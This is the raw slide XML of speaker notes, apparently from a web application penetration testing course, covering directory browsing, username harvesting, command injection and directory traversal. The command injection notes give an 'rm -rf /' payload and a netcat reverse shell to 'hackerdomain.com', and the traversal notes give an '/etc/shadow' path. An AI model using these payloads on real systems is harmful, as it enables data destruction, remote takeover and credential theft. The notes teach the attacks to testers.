        <p:nvSpPr>
          <p:cNvPr id="257027"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dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Another method for finding directories is to manual look for them.  As you go through the application map from yesterday, access each of the directories in the URLs without the page name.  If they allow access, you will get a directory listing.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>One note to remember is that even though index.html or something similar is commonly the default index page, this may not be how the server is configured.  So if we find a URL such as http://www.secureideas.com/content/pages/index.html, make sure you try http://www.secureideas.com/content/pages.  That way, if the server is not configured to use index.html, we will find the directory list.</a:t>
            </a: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62</a:t>
            </a:fld>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a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>There are many directories which are not readily encountered when surfing a site normally.  Many "hidden" directories and files can be found by simply asking the web server for them.  If the web server responds with "Forbidden" instead of "Not Found," then you</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>'ve found one.  Often the directories are forbidden for directory listing, but the files inside are readable.  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Automated tools often have a list of common directory names and files which are of interest and likely available if hidden.  Simply asking the server for them often turns up some interesting results.  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Major web application penetration testing tools, such as WebInspect, by SPIDynamics, include this functionality.  These tools use both brute forcing and following links to find the directories.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Nikto uses known directory names to determine if it can find directory listing.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>As we covered yesterday, OWASP's DirBuster can use brute force techniques to find indexes.</a:t>
            </a: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63</a:t>
            </a:fld>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Slide Image Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="259075" name="Notes Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="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a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>In this next exercise, we will find and exploit directory browsing issues.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="450"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-GB">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRP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64</a:t>
            </a:fld>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Slide Image Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="263171" name="Notes Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="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a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Username harvesting provides the attacker with half of the information needed to access an account.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="450"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-GB">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRP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65</a:t>
            </a:fld>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Rot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="264195"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a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Harvesting usernames is one of the more time consuming portions of discovery.  By collecting the logins, the attacker only needs to guess the passwords to gain privileges into the application.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Some web applications respond differently if a username does not exist than if the password is incorrect.  They might as well provide a "isValidUsername()" web service, as the difference provides us with a binary test for valid usernames.  This test allows us to input a set of possible usernames and automatically determine which are valid.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The difference is not always apparent.  Sometimes it comes in the form of a HTTP Redirect (302 message), and sometimes the resulting URL is different.  Most often these two identifiers occur together.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRP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66</a:t>
            </a:fld>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xfrm>
            <a:off x="1258888" y="720725"/>
            <a:ext cx="4800600" cy="3600450"/>
          </a:xfrm>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="265219"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a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Login error messages are great for the attacker.  Quite often the application will display two different results depending on whether the attacker entered an incorrect user or a correct user but the wrong password.  While this is a simple flaw and should not be found in a modern application, we find it quite often.</a:t>
            </a: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67</a:t>
            </a:fld>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Rot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="266243"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a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Another error that allows the attacker to harvest user names is to use a parameter in the URL to signify which error condition has happened.  Either result in the same message on the screen, but the URL shows which has happened.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Another problem with this type of error message is that an attacker can enumerate various error messages within the system.  This is possible when an application uses a single error handling system and the system does not take in account the page that has the error.  An attacker can imply iterate through the error numbers.</a:t>
            </a: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68</a:t>
            </a:fld>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Slide Image Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="267267" name="Notes Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="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a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>There are a number of other types of error conditions that can disclose valid usernames.  Two of these are content changes and timing differences.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Content changes are where the code that handles the incorrect username has different content than the code that handles the incorrect password.  These differences can be within the HTML tags or even something as simple as an extra space.  The easiest way to determine this is using diff tools.  Burp Suite comes with such a tool, the Comparer.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Timing differences are not as common.  These are caused by the authentication code using two separate queries to determine the validity of the log in.  The first query would search to see if the user name is valid.  If it is correct, then the application will query to see if the password is correct.   Since a valid user name executes two different queries, the code will take longer to return.  This difference can be determined by the attacker.</a:t>
            </a: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69</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dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>As we discussed earlier, many attackers will create custom scripts.  So should professional testers.  These scripts can be made to work within a very specific site.  Or they can be more generic but suited to a particular need the attacker has within many sites.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
              <a:cs typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Since most languages support HTTP requests and processing the resulting text, you should use which ever language you are most familiar.  Even if that is VBScript.  But in this class we had to pick one, so we are going to cover Python.  While every language has its supporters and we don't want to start a language war in class, Python is currently being used to write most of the new web application testing tools.  So knowing the language will not only help us perform our tests better, it will also help us in troubleshooting and/or fixing and expanding or tools.</a:t>
            </a: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7</a:t>
            </a:fld>
            <a:endParaRPr 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Rot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="268291"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a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>There are a number of typical web application inputs which you can use to harvest usernames. Login fields are the most obvious, but there are other options. For example, password-recovery pages can be extremely helpful. If the username you enter is valid, then the password recovery site generally prints a different message than if it is invalid. (You may also find that you can reset users</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>' passwords by answering password reset questions based on publicly-available information.)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRP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70</a:t>
            </a:fld>
            <a:endParaRPr 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Rot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="269315"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a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Scripting this type of attack is a great idea (automation in general allows you to conduct efficient and repeatable testing).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Scripts requires two different things: command line web tools and a list of potential user names.  Wget and curl are two of the best tools.  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The second requirement is a comprehensive list of potential names.  In previous penetration tests, we have made successful use of US census data to generate these lists.</a:t>
            </a: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71</a:t>
            </a:fld>
            <a:endParaRPr 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Slide Image Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="270339" name="Notes Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="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a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>In this exercise, we will discover and abuse a username harvesting issue.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="450"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-GB">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRP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72</a:t>
            </a:fld>
            <a:endParaRPr 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Slide Image Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="275459" name="Notes Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="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a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>We will now explore how command injection works and ways to find issues with it in applications.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="450"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-GB">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRP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73</a:t>
            </a:fld>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p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="276483"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a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Many applications used to be written in Unix shell scripts, such as BASH and PERL, and the variable separation was rather crude.  Even worse, often these scripts incorporated calls to external applications.  Such a call often looked like this:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>    system("externaltool ".variable);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>where the variable was input from the web application.  If the input included a ";"  additional commands could be executed.  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>For example, imagine a script which calls an external program to authenticate the user.  An attacker types the following text in the "username" field in the web interface:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>"ura" </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>…And then types the following text into the "password" field: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>"l00ser; rm -rf /".</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>This translates to the following:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>    system(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>'authenticate ura:l00ser; rm -rf /')</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>If the script is running with root privileges, then the attacker has deleted the contents of the root partition. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>How about a password of "; /usr/bin/nc -e /bin/sh hackerdomain.com 31337"?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRP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74</a:t>
            </a:fld>
            <a:endParaRPr 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Discovering command injection is as</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> simple as any other injection.  We look at each parameter and determine if it is used as part of an operating system command.  We then fuzz it to see what happens.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{CE86D591-EB46-49C9-B58B-417466F1609D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>75</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="164343129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Rot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="277507"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dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>If the application runs the command and then either displays the command or creates content based on the results, these types of commands are useful. This is less common than the next option.  Some common commands to run are:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1597025" lvl="4" indent="-217488">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>ls</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1597025" lvl="4" indent="-217488">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>netstat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> –an</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1597025" lvl="4" indent="-217488">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Adduser</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1597025" lvl="4" indent="-217488"/>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>If the application doesn'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>t display the results, either in whole or by building content from the results, then the attacker must use commands that will generate traffic across the network.  A typical way to do this would be to ping an address that is under the attacker's control.  The attacker then only needs to run a sniffer and detect the ICMP echo requests.  Another means would be to run a command that would result in the machine requesting a page from a web server the attacker controls.  Monitoring the web server logs would let the attacker see the traffic.  If the attacker would like to send data from the server, they only need to make the data part of the URI request.  Again, reading the web server logs would provide the information to the attacker.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRP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76</a:t>
            </a:fld>
            <a:endParaRPr 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Slide Image Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="278531" name="Notes Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="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a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>In this next exercise, we will find and exploit a command injection flaw in the application AWStats.</a:t>
            </a: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77</a:t>
            </a:fld>
            <a:endParaRPr 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Slide Image Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="282627" name="Notes Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="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a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Directory traversal is a file control bypass flaw.  It allows the attacker to leave the web root and read other files.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRP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78</a:t>
            </a:fld>
            <a:endParaRPr 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Rot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="283651"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a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Directory traversal and file include is when we trick the web application into letting us either read or execute files which are not in the WEBROOT directory structure.    Of course file include can be used to read files within the WEBROOT.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The precise methodology depends on the nature of vulnerability that we are leveraging. Sometimes the vulnerability will allow us to simply input "../../../../../etc/shadow" or whatnot.  Other vulnerabilities will require us to modify the encoding, changing it to Unicode, for example.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>IIS was vulnerable to Directory Traversal several years ago… several times!  The first vulnerability was solved by a patch which tracked "/" characters.  This was easily defeated by encoding the "/" as Unicode, since Unicode decoding was performed *after* the directory constraints were enforced.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRP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79</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a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14339" name="Notes Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="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dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>We are now going to review Python from the perspective of a penetration tester.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="450"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
              <a:cs typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
              <a:cs typeface="MS PGothic" charset="0"/>
            </a:endParaRP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8</a:t>
            </a:fld>
            <a:endParaRPr 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Rot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="284675"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a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The traditional example is a flaw from IIS.  This flaw allowed an attacker to craft a URL that accessed the scripts directory but then went up the directory tree to finally access cmd.exe.  The scripts directory was important, since by default it was the only directory that programs were allowed to execute from.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>This is not an IIS problem.  Many different servers and applications have been vulnerable and more are found quite often. Typically this is a bug in the server implementation. But we will see next how applications can be vulnerable to this also.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRP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80</a:t>
            </a:fld>
            <a:endParaRPr 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a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Sometimes a web application will allow the browser to specify a configuration file and location on the server, to be included with the master configuration for that session.  </a:t>
            </a:r>
          </a:p>
          <a:p>
